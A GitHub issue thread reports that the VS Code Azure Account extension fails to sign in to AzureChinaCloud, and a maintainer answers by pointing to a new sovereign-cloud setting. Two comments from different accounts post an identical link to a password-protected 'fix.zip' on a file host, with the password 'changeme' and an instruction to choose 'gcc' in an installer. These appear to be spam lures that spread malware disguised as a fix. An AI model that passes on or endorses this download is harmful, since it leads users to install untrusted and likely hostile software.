### ISSUE TITLE
Bug report: vscode can't connect to AzureChinaCloud

### ISSUE THREAD

**Issue by kevinzhg** [microsoft/vscode-azure-account#996]
- VS Code Version:
- 1.92.2
- Azure Account Extension Version:0.12.0
- OS Version:MacOS14.6.1 (23G93)

Are you connected to a proxy server? Yes/No
no
Steps to Reproduce:

1.go to the setting -> azure configuration -> Azure Cloud -> AzureChinaCloud
2.Enter the sign
3. the WebPage shows the sign successfully 
4. go to the Azure extension table, it still asked to sign in to Azure, and when it's clicked, it redirect to  Azure Global portal once more.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alexweininger** [comment]
Sorry for the confusion. We've switched to a new authentication platform. 

To connect to a sovereign cloud, set the `microsoft-sovereign-cloud.environment` setting. This is new as of v0.8.0 and is a result of our migration to the built-in Microsoft authentication extension which replaces the Azure Account extension. [Learn more in the release notes.](https://github.com/microsoft/vscode-azureresourcegroups/releases/tag/v0.8.0)
